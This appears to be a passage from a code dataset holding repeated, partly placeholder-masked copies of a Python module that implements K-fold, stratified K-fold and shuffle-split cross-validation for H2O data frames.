n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\ndef h2o_train_test_split(frame, test_size=None, train_size=None,\n random_state=None, stratify=None):\n \"\"\"Splits an H2OFrame into random train and test subsets\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n test_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the test split. If\n int, represents the absolute number of test samples. If None,\n the value is automatically set to the complement of the train size.\n If train size is also None, test size is set to 0.25\n\n train_size : float, int, or None (default=None)\n If float, should be between 0.0 and 1.0 and represent the\n proportion of the dataset to include in the train split. If\n int, represents the absolute number of train samples. If None,\n the value is automatically set to the complement of the test size.\n\n random_state : int or RandomState\n Pseudo-random number generator state used for random sampling.\n\n stratify : str or None (default=None)\n The name of the target on which to stratify the sampling\n\n Returns\n -------\n\n out : tuple, shape=(2,)\n training_frame : H2OFrame\n The training fold split\n\n testing_frame : H2OFrame\n The testing fold split\n \"\"\"\n frame = check_frame(frame, copy=False)\n if test_size is None and train_size is None:\n test_size = 0.25\n if stratify is not None:\n CVClass = H2OStratifiedShuffleSplit\n else:\n CVClass = H2OShuffleSplit\n cv = CVClass(n_splits=2, test_size=test_size, train_size=train_size,\n random_state=random_state)\n tr_te_tuples = [(tr, te) for tr, te in cv.split(frame, stratify)][0]\n train, test = sorted(list(tr_te_tuples[0])), sorted(list(tr_te_tuples[1]))\n out = frame[train, :], frame[test, :]\n return out\n\n\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n\n\ndef _build_repr(self):\n cls = self.__class__\n init = getattr(cls.__init__, 'deprecated_original', cls.__init__)\n init_signature = signature(init)\n if init is object.__init__:\n args = []\n else:\n args = sorted([p.name for p in init_signature.parameters.values() if\n p.name != 'self' and p.kind != p.VAR_KEYWORD])\n class_name = self.__class__.__name__\n params = dict()\n for key in args:\n warnings.simplefilter('always', DeprecationWarning)\n try:\n with warnings.catch_warnings(record=True) as w:\n value = getattr(self, key, None)\n if len(w) and w[0].category == DeprecationWarning:\n continue\n finally:\n warnings.filters.pop(0)\n params[key] = value\n return '%s(%s)' % (class_name, _pprint(params, offset=len(class_name)))\n\n\ndef check_cv(cv=3):\n \"\"\"Checks the ``cv`` parameter to determine\n whether it's a valid int or H2OBaseCrossValidator.\n\n Parameters\n ----------\n\n cv : int or H2OBaseCrossValidator, optional (default=3)\n The number of folds or the H2OBaseCrossValidator\n instance.\n\n Returns\n -------\n\n cv : H2OBaseCrossValidator\n The instance of H2OBaseCrossValidator\n \"\"\"\n if cv is None:\n cv = 3\n if isinstance(cv, numbers.Integral):\n return H2OKFold(cv)\n if not isinstance(cv, H2OBaseCrossValidator):\n raise ValueError(\n 'expected int or instance of H2OBaseCrossValidator but got %s' %\n type(cv))\n return cv\n\n\n<function token>\n<assignment token>\n\n\ndef _val_y(y):\n if isinstance(y, six.string_types):\n return str(y)\n elif y is None:\n return y\n raise TypeError('y must be a string. Got %s' % y)\n\n\nclass H2OBaseCrossValidator(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2O cross validation operations.\n All implementing subclasses should override ``get_n_splits``\n and ``_iter_test_indices``.\n \"\"\"\n\n def __init__(self):\n pass\n\n def split(self, frame, y=None):\n \"\"\"Generate indices to split data into training and test.\n\n Parameters\n ----------\n\n frame : ``H2OFrame``\n The h2o frame to split\n\n y : str, optional (default=None)\n The name of the column to stratify, if applicable.\n\n Returns\n -------\n\n train : ndarray\n The training set indices for the split\n\n test : ndarray\n The testing set indices for that split\n \"\"\"\n frame = check_frame(frame, copy=False)\n indices = np.arange(frame.shape[0])\n for test_index in self._iter_test_masks(frame, y):\n train_index = indices[np.logical_not(test_index)]\n test_index = indices[test_index]\n yield list(train_index), list(test_index)\n\n def _iter_test_masks(self, frame, y=None):\n \"\"\"Generates boolean masks corresponding to the tests set.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The h2o frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n\n Returns\n -------\n\n test_mask : np.ndarray, shape=(n_samples,)\n The indices for the test split\n \"\"\"\n for test_index in self._iter_test_indices(frame, y):\n test_mask = np.zeros(frame.shape[0], dtype=np.bool)\n test_mask[test_index] = True\n yield test_mask\n\n def _iter_test_indices(self, frame, y=None):\n raise NotImplementedError(\n 'this method must be implemented by a subclass')\n\n @abstractmethod\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the cross validator.\n \"\"\"\n pass\n\n def __repr__(self):\n return _build_repr(self)\n\n\n<function token>\n<function token>\n\n\nclass H2OBaseShuffleSplit(six.with_metaclass(ABCMeta)):\n \"\"\"Base class for H2OShuffleSplit and H2OStratifiedShuffleSplit. This\n is used for ``h2o_train_test_split`` in strategic train/test splits of\n H2OFrames. Implementing subclasses should override ``_iter_indices``.\n\n Parameters\n ----------\n\n n_splits : int, optional (default=2)\n The number of folds or splits in the split\n\n test_size : float or int, optional (default=0.1)\n The ratio of observations for the test fold\n\n train_size : float or int, optional (default=None)\n The ratio of observations for the train fold \n\n random_state : int or RandomState, optional (default=None)\n The random state for duplicative purposes. \n \"\"\"\n\n def __init__(self, n_splits=2, test_size=0.1, train_size=None,\n random_state=None):\n _validate_shuffle_split_init(test_size, train_size)\n self.n_splits = n_splits\n self.test_size = test_size\n self.train_size = train_size\n self.random_state = random_state\n\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n for train, test in self._iter_indices(frame, y):\n yield train, test\n\n @abstractmethod\n def _iter_indices(self, frame, y):\n \"\"\"Abstract method for iterating the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n pass\n\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds for\n this instance of the shuffle split.\n \"\"\"\n return self.n_splits\n\n def __repr__(self):\n return _build_repr(self)\n\n\nclass H2OShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Default shuffle splitter used for ``h2o_train_test_split``.\n This shuffle split class will not perform any stratification, and\n will simply shuffle indices and split into the number of specified\n sub-frames.\n \"\"\"\n\n def _iter_indices(self, frame, y=None):\n \"\"\"Iterate the indices.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify. Since this class does\n not perform stratification, ``y`` is unused.\n\n Returns\n -------\n\n ind_train : np.ndarray, shape=(n_samples,)\n The train indices\n\n ind_test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n rng = check_random_state(self.random_state)\n for i in range(self.n_splits):\n permutation = rng.permutation(n_samples)\n ind_test = permutation[:n_test]\n ind_train = permutation[n_test:n_test + n_train]\n yield ind_train, ind_test\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n 